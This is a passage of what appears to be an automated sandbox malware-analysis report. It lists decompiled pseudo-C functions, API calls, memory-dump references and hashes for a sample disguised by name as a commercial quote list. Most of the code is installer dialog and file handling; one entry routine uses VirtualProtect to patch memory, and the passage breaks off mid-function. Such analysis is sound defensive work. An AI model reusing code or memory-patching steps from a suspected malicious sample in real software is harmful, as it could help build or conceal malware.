                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                                                                                                                  • Instruction Fuzzy Hash: 80E0EC3261425AABDF109E959C40FEB7B6CEF45360F048532F915E6590E231E8219FA9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 1000270B Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000404c, 4, 0x40, 0x1000403c); // executed
					 *0x1000404c = 0xc2;
					 *0x1000403c = 0;
					 *0x10004044 = 0;
					 *0x10004058 = 0;
					 *0x10004048 = 0;
					 *0x10004040 = 0;
					 *0x10004050 = 0;
					 *0x1000404e = 0;
				}
				return 1;
			}



                                                                                                                                                                                  0x10002714
                                                                                                                                                                                  0x10002719
                                                                                                                                                                                  0x10002729
                                                                                                                                                                                  0x10002731
                                                                                                                                                                                  0x10002738
                                                                                                                                                                                  0x1000273d
                                                                                                                                                                                  0x10002742
                                                                                                                                                                                  0x10002747
                                                                                                                                                                                  0x1000274c
                                                                                                                                                                                  0x10002751
                                                                                                                                                                                  0x10002756
                                                                                                                                                                                  0x10002756
                                                                                                                                                                                  0x1000275e

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11531499304.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11531472460.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11531531886.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11531564017.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                  • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                                                                                                  • Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
                                                                                                                                                                                  • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                                                                                                  • Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00403F60 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E00403F60(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x42dbd8; // 0x103c8
				if(_t2 != 0) {
					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                                                                                                                                                  0x00403f60
                                                                                                                                                                                  0x00403f67
                                                                                                                                                                                  0x00403f72
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403f72
                                                                                                                                                                                  0x00403f78

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SendMessageA.USER32(000103C8,00000000,00000000,00000000), ref: 00403F72
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                  • Opcode ID: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                                                                                                                                  • Instruction ID: 75b6af85c7b4550c46e72781509667ec0f8baecc0ee27a44b040c7e6c7b1aa08
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1FC04875B88201BAEE218B609D4AF167BA8AB60B42F258429B211E60E0C674F410DA2D
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00403F49 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E00403F49(int _a4) {
				long _t2;

				_t2 = SendMessageA( *0x42e408, 0x28, _a4, "true"); // executed
				return _t2;
			}




                                                                                                                                                                                  0x00403f57
                                                                                                                                                                                  0x00403f5d

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SendMessageA.USER32(00000028,?,?,00403D7A), ref: 00403F57
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                  • Opcode ID: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                                                                                                                                  • Instruction ID: 9ba269cb94747afcd00db45940492297b6475019a1e9eeef8f710f25602b24aa
                                                                                                                                                                                  • Opcode Fuzzy Hash: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                                                                                                                                  • Instruction Fuzzy Hash: 71B01235684200BBFE325B00DE0DF457E62F768701F008034B300250F1C7B200A2DB29
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 004030C7 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E004030C7(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                                                                                  0x004030d5
                                                                                                                                                                                  0x004030db

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 004030D5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                                                  • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                                                                                  • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                                                                                  • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00403F36 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E00403F36(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x429864, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                  0x00403f40
                                                                                                                                                                                  0x00403f46

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00403D13), ref: 00403F40
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                                                                  • Opcode ID: 30d96cd9fc0d8ad999d68dc10700da8fc20303459ddb892013b18747b66c33f5
                                                                                                                                                                                  • Instruction ID: 0d109c2b2df33cddb2fdb4737f0edb640fcb727031da007fe45ed195bb05a301
                                                                                                                                                                                  • Opcode Fuzzy Hash: 30d96cd9fc0d8ad999d68dc10700da8fc20303459ddb892013b18747b66c33f5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 57A012314041009BCB015B10DF04C097F61A750300B054430E1044403482310820FF09
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 004057CC Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E004057CC(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}





                                                                                                                                                                                  0x004057cc
                                                                                                                                                                                  0x004057df
                                                                                                                                                                                  0x004057df
                                                                                                                                                                                  0x004057e3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004057d6
                                                                                                                                                                                  0x004057d9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004057d9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004057d6
                                                                                                                                                                                  0x004057e5

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CharNextA.USER32(?,004031FA,"C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe",00000020), ref: 004057D9
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CharNext
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3213498283-0
                                                                                                                                                                                  • Opcode ID: 34075671c2b15bfe90313587f721bfb83bbc5626d38128025375f4e5ae623440
                                                                                                                                                                                  • Instruction ID: dc214379263094bd3ac6d45bee5908574ed7c4f63653bd68f3b20c8c8f565c76
                                                                                                                                                                                  • Opcode Fuzzy Hash: 34075671c2b15bfe90313587f721bfb83bbc5626d38128025375f4e5ae623440
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AC08C3440C784EBC6214720902886BBFF0AA52300F3884ABF0C263251E238AC10AB3B
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Function 004048C5 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMONCrypto
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                                                  			E004048C5(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				long _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				int _t194;
				intOrPtr _t195;
				intOrPtr _t197;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t273;
				long _t276;
				int _t277;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				int _t295;
				int _t296;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageA;
				_v20 =  *0x42e428;
				_t282 = 0;
				_v24 =  *0x42e410 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x42e419 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6a) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404813(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x418 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x42e418) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x42984c; // 0x0
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x429860; // 0x0
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x42984c = _t282;
								 *0x429860 = _t282;
								 *0x42e460 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x42e419 & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404893();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_t194 =  *0x429860; // 0x0
									_v32 = _t194;
									_t195 =  *0x42e428;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42e42c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, "true");
										_t197 =  *0x42dbdc; // 0x73cfd8
										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
											E004047CE(0x3ff, 0xfffffffb, E004047E6(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x106]);
									} while (_v20 <  *0x42e42c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x429860);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageA(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageA(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageA(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageA(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x42e460 = _t306;
					 *0x429860 = GlobalAlloc(0x40,  *0x42e42c << 2);
					_t252 = LoadBitmapA( *0x42e400, 0x6e);
					 *0x429854 =  *0x429854 | 0xffffffff;
					_t313 = _t252;
					 *0x42985c = SetWindowLongA(_v8, 0xfffffffc, E00404EBC);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42984c = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42984c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t282, E00405D51(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E00403F14(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E00403F14(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42e42c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										_t273 = SendMessageA(_v8, 0x1100, 0,  &_v84);
										_t295 =  *0x429860; // 0x0
										 *(_t295 + _t316 * 4) = _t273;
									} else {
										_t284 = SendMessageA(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_t296 =  *0x429860; // 0x0
									_v32 = 1;
